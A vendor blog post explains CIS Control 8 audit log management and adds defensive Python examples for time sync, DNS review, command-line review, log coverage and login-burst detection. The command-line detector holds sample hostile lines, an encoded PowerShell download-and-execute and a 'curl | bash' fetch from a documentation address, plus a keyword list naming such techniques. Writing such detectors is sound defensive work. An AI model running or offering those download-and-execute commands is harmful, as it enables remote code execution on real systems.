CIS logs: CIS control 8 (Audit Log Management)

  Cyvatar | 12/10/2021

If there is one inescapable fact that all organizations need to face in the changed, post-pandemic circumstances, it is this: putting in place a robust cyber defense to protect their information assets is no longer an option but an imperative. And that can be daunting.

For one, there is no dearth of information, tools, and technologies telling cybersecurity professionals how to secure their information assets and infrastructure.

Then there are myriad security requirements, standards, risk management frameworks, compliance regimes, and regulatory mandates that need to be met.

The whole process can be overwhelming and can lead to imminent threats being overlooked. The best way to avoid that situation is to start with CIS logs, the audit log requirements that make up Control 8 of the CIS Critical Security Controls version 8.

What this article calls CIS logs are the audit logs that the Center for Internet Security's Control 8 asks you to collect, review, alert on and retain: the records of events that let you detect, understand and recover from a cyber attack.

However, before we go into CIS logs, it helps to understand the structure and implementation of the CIS Controls, which are referenced throughout the CIS Benchmarks. (Already familiar with CIS Benchmarks and the structure of the CIS Controls? Skip ahead to the CIS logs section.)

What are CIS Benchmarks?

CIS Benchmarks are consensus-developed configuration guides: each one gives a set of configuration standards and best practices for hardening a specific technology in order to protect an organization's digital assets.

More than 100 such benchmarks are available.

CIS Benchmarks are used to meet the security and compliance needs of your organization. To let you pick the level that matches those needs, each recommendation in a benchmark is assigned one of two profiles:

  1. Level 1: base-level recommendations that can be implemented quickly and with little impact on functionality.
  2. Level 2: defense-in-depth recommendations for environments where security is paramount; they may reduce functionality or take more effort to implement.

Each benchmark recommendation is mapped to the CIS Control(s) it helps implement, which is why the CIS Controls are referenced throughout the benchmarks.

This brings us to our next question.

What are CIS controls?

CIS Controls are a prioritized set of clear, focused actions that organizations can take to strengthen their cybersecurity. They are a separate CIS program from the Benchmarks, but they are referenced throughout the CIS Benchmarks.

CIS Benchmarks focus on securing a specific system or product, whereas the CIS Controls apply across the whole enterprise environment.

CIS Controls version 8 defines 18 controls. Note that the grouping into three categories below comes from versions 7 and 7.1 (which had 20 controls); version 8 dropped the categories in favour of the Implementation Groups described next, but you will still meet the category names in older material:

  • Basic CIS Controls: general-purpose controls that every organization must implement for fundamental cyber readiness.
  • Foundational CIS Controls: controls built on technical best practices that target more specific threats.
  • Organizational CIS Controls: controls focused on people and processes; they provide long-term security maturity and must be adopted by the organization internally.

The CIS Controls are also prioritized into Implementation Groups (IGs) based on an organization's risk profile and the resources it has available.

There are three IGs. An organization self-assesses which IG it belongs to and then implements the Safeguards (the v8 term for what v7 called Sub-Controls) assigned to that group. The groups are cumulative:

  • Implementation Group 1 (IG1): organizations with limited resources and low data sensitivity implement the Safeguards in this group. IG1 is the baseline of essential cyber hygiene.
  • Implementation Group 2 (IG2): organizations with moderate resources and more sensitive data to handle. They implement both the IG1 and the IG2 Safeguards.
  • Implementation Group 3 (IG3): larger organizations with significant resources and high-risk exposure of critical data and assets. They implement IG3 along with IG2 and IG1.

There are 18 CIS Controls, and discussing all of them is beyond the scope of this article; we will cover each control in detail in a separate post.

In this post we focus on CIS Control 8, which covers CIS logs, and that is probably what you are here for.

CIS logs

Understanding CIS security control 8: Audit Log Management

Why is this CIS control so critical?

Let's get this clear: log collection and analysis are critical to detecting a malicious attack quickly and responding to it.

Often, audit records are the only evidence that an attack has taken place. Attackers know that many organizations keep audit logs for compliance purposes but rarely analyze them, so intrusions can go unnoticed for a long time.

Logging records help you detect a potential threat, or establish whether an attack has happened; if so, when and how it happened, the extent of the attack, what information was accessed, and whether any data was exfiltrated.

CIS logs play a critical role in safeguarding the security of your organization, yet, they are often overlooked.

How is CIS security Control 8 implemented?

Prioritization is at the core of the CIS Controls. Many controls can be phased in according to an organization's threat profile, but Control 8 is essential if you want to detect and analyze cyber-attacks at all.

CIS Control 8 describes how to put in place a comprehensive audit log management system.

It recommends 12 Safeguards (specific, actionable steps) that tell you how to establish an audit log management process, how to collect audit logs, how to store them securely, and how to review them. For each Safeguard below we list the asset type it applies to, its security function, the Implementation Groups that must implement it, and the Safeguards from other controls it depends on.

The 12 Safeguards of CIS Control 8 are:

1. Establish and Maintain an Audit Log Management Process (Safeguard 8.1)

Based on your organization's logging requirements, establish and maintain an audit log management process.

The process:

  • Addresses the collection, retention, and review of audit logs for enterprise assets
  • Is reviewed and updated annually, or whenever a significant enterprise change occurs that could impact this Safeguard

Asset type: Network | Security function: Protect | Implementation groups: IG1, IG2, IG3

Dependencies: None
2. Collect Audit Logs (Safeguard 8.2)

Make sure that logging has been enabled across the organization's assets, as required by the audit log management process. You cannot detect what you never recorded: every asset in the inventory should produce audit logs, and a device that is not logging is a blind spot rather than a low-risk device.

Asset type: Network | Security function: Detect | Implementation groups: IG1, IG2, IG3

Dependencies:

  • Safeguard 1.1 (establish and maintain a detailed enterprise asset inventory)
  • Safeguard 4.1 (establish and maintain a secure configuration process)
  • Safeguard 8.1 (establish and maintain an audit log management process)
3. Ensure Adequate Audit Log Storage (Safeguard 8.3)

It is a nightmare for any organization to assume that malicious activity on its assets is being logged, only to find after an incident that the log destination filled up, the records were dropped or overwritten, and there is no way to reconstruct what happened or how.

Hence, ensure that the logging destinations have adequate storage to comply with the organization's audit log management process. Size the storage from the measured daily log volume and the retention period you have committed to, with headroom for growth and for the burst of events an incident produces.

Asset type: Network | Security function: Protect | Implementation groups: IG1, IG2, IG3

Dependencies:

  • Safeguard 1.1 (establish and maintain a detailed enterprise asset inventory)
4. Standardize Time Synchronization (Safeguard 8.4)

Configure at least two synchronized time sources across enterprise assets, where supported. Consistent clocks are what let you correlate events from different systems; an unsynchronized host produces timestamps that cannot be placed in sequence with anyone else's, and a single time source is a single point of failure for every timeline you will ever build.

Asset type: Network | Security function: Protect | Implementation groups: IG2, IG3

Dependencies:

  • Safeguard 1.1 (establish and maintain a detailed enterprise asset inventory)
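A concrete way to verify this Safeguard on a Linux host, as an added example (not code from the original article or from CIS): the script below parses the output of `chronyc sources`, in the format chrony 3.x/4.x prints, and checks that at least two sources are actually being used for synchronization rather than merely configured. The sample output embedded in it is constructed for the example; the server names are placeholders.

```python
"""Check a host against Safeguard 8.4: at least two usable, synchronized
time sources.

Added example, not code from the original article or from CIS. It parses
the output of `chronyc sources` (the format chrony 3.x/4.x prints) and
counts the sources chrony is actually using. The sample output below is
constructed for this example."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample of `chronyc sources`. The third server is unreachable
# (state '?', Reach 0), so only two of the three configured sources count.
SAMPLE_CHRONYC_SOURCES = """\
MS Name/IP address         Stratum Poll Reach LastRx Last sample
===============================================================================
^* time1.example.com             2   6   377    27   -123us[ -145us] +/-   12ms
^+ time2.example.com             2   6   377    28   +321us[ +299us] +/-   15ms
^? time3.example.com             0   8     0     -     +0ns[   +0ns] +/-    0ns
"""

# First column: mode (^ server, = peer, # local clock) followed by state
# (* selected, + combined, - not combined, ? unreachable, x falseticker,
# ~ too variable). Reach is an octal register of the last eight polls.
SOURCE_LINE = re.compile(
    r"^(?P<mode>[\^=#])(?P<state>[*+?x~-])\s+(?P<name>\S+)\s+"
    r"(?P<stratum>\d+)\s+(?P<poll>-?\d+)\s+(?P<reach>[0-7]+)\s+"
)


@dataclass
class TimeSource:
    name: str
    state: str
    stratum: int
    reach: int  # 0o377 == 255 means all of the last eight polls answered

    @property
    def usable(self) -> bool:
        # Only sources chrony is synchronising to (*) or combining (+) count;
        # a configured but unreachable or rejected server does not.
        return self.state in ("*", "+") and self.reach != 0


def parse_chronyc_sources(text: str) -> list[TimeSource]:
    sources = []
    for line in text.splitlines():
        m = SOURCE_LINE.match(line)
        if not m:  # header and separator lines
            continue
        sources.append(TimeSource(
            name=m.group("name"),
            state=m.group("state"),
            stratum=int(m.group("stratum")),
            reach=int(m.group("reach"), 8),
        ))
    return sources


def check_time_sync(text: str, minimum: int = 2) -> tuple[bool, list[str]]:
    """Return (compliant, names of usable sources) for Safeguard 8.4."""
    usable = [s.name for s in parse_chronyc_sources(text) if s.usable]
    return len(usable) >= minimum, usable


if __name__ == "__main__":
    ok, names = check_time_sync(SAMPLE_CHRONYC_SOURCES)
    print("compliant" if ok else "NON-COMPLIANT", names)
```

To run it against a live host, replace the embedded sample with the captured output of `chronyc sources`. The point of the `usable` check is that a server listed in the configuration is not evidence of synchronization: here three servers are configured, but one has never answered, so the host meets the two-source requirement only just, and a second outage would leave it on a single source.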
5. Collect Detailed Audit Logs (Safeguard 8.5)

Configure detailed audit logging for enterprise assets containing sensitive data.

To support a forensic investigation, detailed audit logging should include, but is not limited to:

  • Event source
  • Date
  • Username
  • Timestamp
  • Source addresses
  • Destination addresses
  • Other useful elements that could assist in an investigation

A practical caveat: many default log formats omit some of these. Classic syslog timestamps carry no year or time zone, and a service's own log rarely records the destination address of the host it runs on, so "detailed" usually means enabling a richer format (or enriching events at the collector) rather than accepting what the default emits.

Asset type: Network | Security function: Detect | Implementation groups: IG2, IG3

Dependencies:

  • Safeguard 1.1 (establish and maintain a detailed enterprise asset inventory)
6. Collect DNS Query Audit Logs (Safeguard 8.6)

Collect DNS query audit logs on enterprise assets, where appropriate and supported. Almost every attack touches DNS at some point, for example to resolve a command-and-control or payload download domain, so DNS query logs show which names a host looked up and when, and are often the quickest way to find which systems spoke to a malicious domain.

Asset type: Network | Security function: Detect | Implementation groups: IG2, IG3

Dependencies:

  • Safeguard 1.1 (establish and maintain a detailed enterprise asset inventory)
  • Safeguard 4.1 (establish and maintain a secure configuration process)
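What "digging into DNS query logs" looks like in practice, as an added example that is not code from the original article or from CIS: two review rules run over a constructed query log. The first flags a client that resolves many distinct names that do not exist (the NXDOMAIN churn of domain-generation-algorithm malware hunting for its controller); the second flags long, high-entropy hostname labels under one parent domain (the shape of data smuggled out inside DNS queries). The log format, client addresses and domain names are all constructed for the example; a real resolver's format would need its own `parse_line()`.

```python
"""Review DNS query logs for two common abuse patterns.

Added example, not code from the original article or from CIS. The input
is a constructed, simplified query log with one record per line:
<timestamp> <client ip> <query name> <qtype> <rcode>. Real resolvers
(BIND, Unbound, Windows DNS Server) each use their own log format, so
parse_line() is the part to adapt; the review logic is format-independent."""
from __future__ import annotations

import math
from collections import defaultdict

# Constructed sample: 10.0.0.5 is normal traffic (one typo), 10.0.0.7 burns
# through random names that do not exist (DGA-like beaconing) and 10.0.0.9
# sends long high-entropy labels as TXT queries (tunnelling-like).
SAMPLE_DNS_LOG = """\
2021-12-10T09:00:01Z 10.0.0.5 www.example.com A NOERROR
2021-12-10T09:00:02Z 10.0.0.5 mail.example.com MX NOERROR
2021-12-10T09:00:03Z 10.0.0.5 wwww.example.com A NXDOMAIN
2021-12-10T09:00:05Z 10.0.0.7 qx7v2k9sj1.biz A NXDOMAIN
2021-12-10T09:00:05Z 10.0.0.7 bd83kq1pzw.biz A NXDOMAIN
2021-12-10T09:00:06Z 10.0.0.7 hq2mw9ocr4.biz A NXDOMAIN
2021-12-10T09:00:06Z 10.0.0.7 zl5nt0yka8.biz A NXDOMAIN
2021-12-10T09:00:07Z 10.0.0.7 fv1xe6dgu3.biz A NXDOMAIN
2021-12-10T09:00:07Z 10.0.0.7 pc4rj8bsm7.biz A NXDOMAIN
2021-12-10T09:00:09Z 10.0.0.9 k3j9q1zv7pm2x8ws4ht0ya6rb5fnc9ud1eg7lo2i.t.example.org TXT NOERROR
2021-12-10T09:00:10Z 10.0.0.9 1zv7pm2x8ws4ht0ya6rb5fnc9ud1eg7lo2ik3j9q.t.example.org TXT NOERROR
2021-12-10T09:00:11Z 10.0.0.9 m2x8ws4ht0ya6rb5fnc9ud1eg7lo2ik3j9q1zv7p.t.example.org TXT NOERROR
"""


def parse_line(line: str) -> dict | None:
    """Split one constructed-format record; None for blank/malformed lines."""
    parts = line.split()
    if len(parts) != 5:
        return None
    ts, client, qname, qtype, rcode = parts
    return {"ts": ts, "client": client, "qname": qname.lower().rstrip("."),
            "qtype": qtype, "rcode": rcode}


def shannon_entropy(s: str) -> float:
    """Bits per character; ~2-3 for English words, 4+ for encoded data."""
    if not s:
        return 0.0
    counts: dict[str, int] = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def review_dns_log(text: str, nx_threshold: int = 5,
                   label_len: int = 30, entropy_min: float = 3.5) -> list[tuple]:
    """Return findings as (rule, client, detail) tuples.

    dga_like:    client asked for >= nx_threshold distinct non-existent names
    tunnel_like: client sent a first label >= label_len chars with entropy
                 >= entropy_min bits/char; detail is the parent domain
    """
    nx_names: dict[str, set[str]] = defaultdict(set)
    tunnel_parents: dict[str, set[str]] = defaultdict(set)
    for line in text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["rcode"] == "NXDOMAIN":
            nx_names[ev["client"]].add(ev["qname"])
        labels = ev["qname"].split(".")
        first = labels[0]
        if len(first) >= label_len and shannon_entropy(first) >= entropy_min:
            tunnel_parents[ev["client"]].add(".".join(labels[1:]))

    findings: list[tuple] = []
    for client, names in sorted(nx_names.items()):
        if len(names) >= nx_threshold:
            findings.append(("dga_like", client, len(names)))
    for client, parents in sorted(tunnel_parents.items()):
        for parent in sorted(parents):
            findings.append(("tunnel_like", client, parent))
    return findings


if __name__ == "__main__":
    for finding in review_dns_log(SAMPLE_DNS_LOG):
        print(*finding)
```

The thresholds are starting points, not tuned values: a single NXDOMAIN from a typo is noise, a handful from one host in seconds is not, and the entropy test is there so that long but readable labels (a CDN hostname, say) do not trip the tunnelling rule. Both rules only work if the resolver logs the client address and the response code, which is the concrete reason Safeguard 8.5's field list matters for DNS.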
7. Collect URL Request Audit Logs (Safeguard 8.7)

Collect URL request audit logs on enterprise assets, where appropriate and supported. Web proxy or gateway URL logs help you trace the source of an intrusion, such as the link a user followed or the address a payload was fetched from.

Asset type: Network | Security function: Detect | Implementation groups: IG2, IG3

Dependencies:

  • Safeguard 1.1 (establish and maintain a detailed enterprise asset inventory)
  • Safeguard 4.1 (establish and maintain a secure configuration process)
8. Collect Command-Line Audit Logs (Safeguard 8.8)

Command-line access in the wrong hands gives an attacker a great deal of control over your enterprise assets, and command-line audit logs are often the first indication of such an intrusion.

To implement this, collect audit logs from PowerShell, BASH, and remote administrative terminals. On Windows this means enabling PowerShell script block logging and process creation auditing with command-line capture; on Linux, auditd rules on execve or an equivalent.

Asset type: Devices | Security function: Detect | Implementation groups: IG2, IG3

Dependencies:

  • Safeguard 1.1 (establish and maintain a detailed enterprise asset inventory)
  • Safeguard 4.1 (establish and maintain a secure configuration process)
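Collecting command lines is only half of it; reviewing them has to cope with the most common evasion, which is PowerShell's `-EncodedCommand` switch. Below, as an added example that is not code from the original article or from CIS, is a reviewer that decodes such arguments (Base64 of the UTF-16LE script) before matching keywords, so that `IEX ... DownloadString` is found even when the raw command line shows only a Base64 blob. The command lines and the keyword list are constructed for the example, and 203.0.113.0/24 is a documentation address range.

```python
"""Review command-line audit logs, decoding PowerShell -EncodedCommand
arguments before matching.

Added example, not code from the original article or from CIS. PowerShell's
-EncodedCommand switch (also accepted as -e, -ec, -enc, ...) takes a Base64
string of the script encoded as UTF-16LE, which hides keywords from naive
string matching on the raw command line. The sample command lines below are
constructed; the 203.0.113.0/24 address is a documentation range."""
import base64
import re

# Keywords a reviewer would want to see, matched case-insensitively against
# the command line plus any decoded payload. The trailing space keeps "-nop "
# from matching the (usually benign) -NoProfile switch.
SUSPICIOUS_KEYWORDS = (
    "invoke-expression", "iex ", "downloadstring", "frombase64string",
    "-nop ", "-w hidden", "bypass", "| bash", "| sh",
)

# -e, -ec, -en, -enc, -encodedcommand (PowerShell accepts any unambiguous
# prefix) followed by a Base64 blob. -ExecutionPolicy does not match because
# no whitespace follows its "-e".
ENCODED_ARG = re.compile(r"(?i)(?<![\w-])-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")

# Constructed sample. The second line is what a dropper typically looks like;
# the payload is encoded here so the Base64 is guaranteed well-formed.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoProfile -Command Get-Process",
    f"powershell.exe -nop -w hidden -enc {ENCODED}",
    "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\scripts\\backup.ps1",
    "bash -c 'curl -s http://203.0.113.10/x.sh | bash'",
]


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries an -EncodedCommand, else None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def review_command_line(cmdline: str) -> dict:
    """Match keywords against the raw line and, if present, the decoded script."""
    decoded = decode_encoded_command(cmdline)
    haystack = (cmdline + " " + (decoded or "")).lower()
    hits = [k for k in SUSPICIOUS_KEYWORDS if k in haystack]
    return {"cmdline": cmdline, "decoded": decoded, "hits": hits}


def review_command_lines(lines) -> list:
    """Only the command lines that matched at least one keyword."""
    return [r for r in map(review_command_line, lines) if r["hits"]]


if __name__ == "__main__":
    for r in review_command_lines(SAMPLE_COMMAND_LINES):
        print(r["hits"], "<-", r["decoded"] or r["cmdline"])
```

Two things the example is meant to show: without the decoding step the encoded line would match only on `-nop` and `-w hidden`, never on the actual download-and-execute, and a keyword list that is too loose (`-nop` without the trailing space, `-e` matched as a bare prefix) will page you for every `-NoProfile` and `-ExecutionPolicy` in your fleet. Layer the decoded script into the stored event rather than just the alert, so the analyst who reads the log later sees the plaintext.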
9. Centralize Audit Logs (Safeguard 8.9)

Centralize audit log collection and retention across enterprise assets, to the extent possible. Logs that live only on the host that produced them can be altered or deleted by whoever compromises that host; shipping them promptly to a central, separately administered store preserves the evidence and is what makes cross-system correlation possible.

Asset type: Network | Security function: Detect | Implementation groups: IG2, IG3

Dependencies:

  • Safeguard 1.1 (establish and maintain a detailed enterprise asset inventory)
  • Safeguard 2.1 (establish and maintain a software inventory)
10. Retain Audit Logs (Safeguard 8.10)

Retain audit logs across enterprise assets for a minimum of 90 days. Treat this as a floor, not a target: the dwell time of an intrusion is frequently longer than that, and regulatory or contractual obligations may require more.

Asset type: Network | Security function: Protect | Implementation groups: IG2, IG3

Dependencies:

  • Safeguard 4.1 (establish and maintain a secure configuration process)
  • Safeguard 8.9 (centralize audit logs)
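Safeguards 8.2, 8.9 and 8.10 are verified together in practice: is every inventoried asset sending logs to the central store, has any source gone quiet, and does the store actually hold 90 days of history for each one? The check below is an added example, not code from the original article or from CIS. Its two inputs are constructed: the asset list stands in for the Safeguard 1.1 inventory, and the per-source summary (newest and oldest event held) stands in for what any central log platform can report; the host names and timestamps are invented.

```python
"""Health check for a central log collector: which inventoried assets are not
sending logs, which have gone quiet, and which have less history retained
than the 90 days Safeguard 8.10 requires.

Added example, not code from the original article or from CIS; it ties
Safeguards 8.2, 8.9 and 8.10 together. Both inputs are constructed: the
asset list stands in for the Safeguard 1.1 inventory, and COLLECTOR_STATS
stands in for the per-source summary any central log platform can produce
(newest and oldest event it holds for each source)."""
from datetime import datetime, timedelta, timezone

# Constructed stand-in for the Safeguard 1.1 asset inventory.
INVENTORY = ["web01", "web02", "db01", "dc01", "fw01"]

# Constructed stand-in for what the central collector reports per source.
COLLECTOR_STATS = {
    "web01": {"last_event": "2021-12-10T08:59:30Z", "oldest_event": "2021-09-01T00:00:00Z"},
    "web02": {"last_event": "2021-12-07T14:02:11Z", "oldest_event": "2021-09-01T00:00:00Z"},  # quiet ~3 days
    "db01":  {"last_event": "2021-12-10T08:58:02Z", "oldest_event": "2021-11-20T00:00:00Z"},  # ~20 days kept
    "dc01":  {"last_event": "2021-12-10T08:59:59Z", "oldest_event": "2021-09-01T00:00:00Z"},
    "ws17":  {"last_event": "2021-12-10T08:30:00Z", "oldest_event": "2021-10-01T00:00:00Z"},  # not inventoried
}
NOW = datetime(2021, 12, 10, 9, 0, tzinfo=timezone.utc)  # fixed so the example is reproducible


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def audit_log_coverage(inventory, stats, now,
                       max_silence=timedelta(hours=24),
                       retention=timedelta(days=90)):
    """Return sorted (host, finding) pairs.

    not_reporting   inventoried asset the collector has never heard from (8.2/8.9)
    stale           asset whose newest event is older than max_silence (8.2)
    retention_short asset with less than `retention` of history held (8.10);
                    expected for sources onboarded less than 90 days ago,
                    a real gap for everything else
    unknown_source  something sending logs that is not in the inventory (1.1)
    """
    findings = []
    for host in inventory:
        s = stats.get(host)
        if s is None:
            findings.append((host, "not_reporting"))
            continue
        if now - parse_ts(s["last_event"]) > max_silence:
            findings.append((host, "stale"))
        if now - parse_ts(s["oldest_event"]) < retention:
            findings.append((host, "retention_short"))
    for host in stats:
        if host not in inventory:
            findings.append((host, "unknown_source"))
    return sorted(findings)


if __name__ == "__main__":
    for host, finding in audit_log_coverage(INVENTORY, COLLECTOR_STATS, NOW):
        print(f"{host:8} {finding}")
```

Run this on a schedule and alert on its output: a source that silently stops forwarding is the same blind spot as one that was never enabled, and the "unknown_source" case is the inventory (Safeguard 1.1) being wrong rather than the collector, which is worth knowing too. The `retention_short` rule is the cheapest way to discover that a log destination has been rotating faster than your policy says, which is precisely the failure Safeguard 8.3 warns about.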
11. Conduct Audit Log Reviews (Safeguard 8.11)

Conduct reviews of audit logs to detect anomalies or abnormal events that could indicate a potential threat. Conduct reviews on a weekly, or more frequent, basis. A review means someone (or an automated rule that someone owns) actually asking questions of the data; logs that are collected and never read satisfy an auditor, not a defender.

Asset type: Network | Security function: Detect | Implementation groups: IG2, IG3

Dependencies: None
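Two review rules of the kind a weekly (or continuous) review would run, as an added example that is not code from the original article or from CIS: a burst of authentication failures from one source address, a success from that same address while the burst is still in the window, and an administrative logon outside business hours. The events are constructed and already normalized to the Safeguard 8.5 fields (event source, timestamp, username, source and destination address) with an outcome added; the admin account list, business hours and 198.51.100.0/24 (a documentation range) are assumptions for the example.

```python
"""Two audit log review rules run over authentication events.

Added example, not code from the original article or from CIS. The events
are constructed and already normalized to the fields Safeguard 8.5 asks for
(source, timestamp, user, source and destination address) plus an outcome;
in practice they would come from the central log store of Safeguard 8.9.
198.51.100.0/24 is a documentation address range."""
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

ADMIN_USERS = {"admin-bob"}     # assumed: accounts that warrant off-hours scrutiny
BUSINESS_HOURS = range(7, 19)   # assumed: 07:00 to 18:59 UTC


def ev(ts, user, src, outcome, source="dc01", dst="10.0.0.1"):
    """Build one constructed, already-normalized authentication event."""
    return {"source": source, "ts": ts, "user": user, "src": src, "dst": dst,
            "outcome": outcome}


# Constructed sample: one address tries five accounts in twenty seconds and
# then gets in; a normal daytime logon; a lone typo; an admin logon at 23:40.
SAMPLE_AUTH_EVENTS = [
    ev("2021-12-10T02:10:00Z", "alice", "198.51.100.7", "failure"),
    ev("2021-12-10T02:10:05Z", "bob",   "198.51.100.7", "failure"),
    ev("2021-12-10T02:10:09Z", "carol", "198.51.100.7", "failure"),
    ev("2021-12-10T02:10:14Z", "dave",  "198.51.100.7", "failure"),
    ev("2021-12-10T02:10:20Z", "erin",  "198.51.100.7", "failure"),
    ev("2021-12-10T02:10:31Z", "erin",  "198.51.100.7", "success"),
    ev("2021-12-10T09:15:00Z", "alice", "10.0.0.5", "success"),
    ev("2021-12-10T10:00:00Z", "carol", "10.0.0.6", "failure"),
    ev("2021-12-10T23:40:00Z", "admin-bob", "10.0.0.20", "success"),
]


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def review_auth_events(events, fail_threshold=5, window=timedelta(minutes=10)):
    """Return findings in detection order.

    failure_burst        fail_threshold failures from one src inside window
                         (fires once, when the threshold is first reached)
    success_after_burst  a success from a src whose burst is still in window
    off_hours_admin      an ADMIN_USERS logon outside BUSINESS_HOURS
    """
    failures = defaultdict(deque)   # src -> timestamps of recent failures
    findings = []
    for e in sorted(events, key=lambda x: x["ts"]):
        ts = parse_ts(e["ts"])
        recent = failures[e["src"]]
        while recent and ts - recent[0] > window:   # slide the window
            recent.popleft()
        if e["outcome"] == "failure":
            recent.append(ts)
            if len(recent) == fail_threshold:
                findings.append(("failure_burst", e["src"], e["ts"]))
        else:
            if len(recent) >= fail_threshold:
                findings.append(("success_after_burst", e["src"], e["user"]))
            if e["user"] in ADMIN_USERS and ts.hour not in BUSINESS_HOURS:
                findings.append(("off_hours_admin", e["user"], e["ts"]))
    return findings


if __name__ == "__main__":
    for finding in review_auth_events(SAMPLE_AUTH_EVENTS):
        print(*finding)
```

The sliding window is the part worth copying: keying failures by source address rather than by account is what catches a password spray, where each account sees only one failure. The `success_after_burst` rule is the one to page on, since it turns "someone is knocking" into "someone got in", and it needs the clocks from Safeguard 8.4 to be right, because the window is computed across events that may come from different hosts.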
12. Collect Service Provider Logs (Safeguard 8.12)

Collect service provider logs, where supported. Example implementations are collecting:

  • Authentication and authorization events
  • Data creation and disposal events
  • User management events

Asset type: Data | Security function: Detect | Implementation groups: IG3

Dependencies:

  • Safeguard 4.1 (establish and maintain a secure configuration process)
  • Safeguard 15.1 (establish and maintain an inventory of service providers)

Conclusion

Building a sound cyber defense is challenging for organizations. It is even more challenging to have a system in place that monitors and analyzes what happens on the network.

That demands proper log collection and analysis for any potential cyber threat, and the CIS logs of CIS Control 8 are the answer.

However, lacking cyber expertise and constrained by small budgets and limited staff, many organizations shy away from implementing the CIS Controls.

The good news is that with Cyvatar's CSaaS subscription (fixed monthly price) model, cybersecurity is always affordable for SMBs and SMEs.

A quote from Wes Whitteker, author of Leading Effective Cybersecurity with Critical Security Controls, will help you set off in the right direction.

“If the functions that set an organization’s cybersecurity foundations are flawed, it is very likely that the solutions they choose will be flawed, too.”


We can help you find the right solution for your cybersecurity problems. Talk to our cyber experts now.
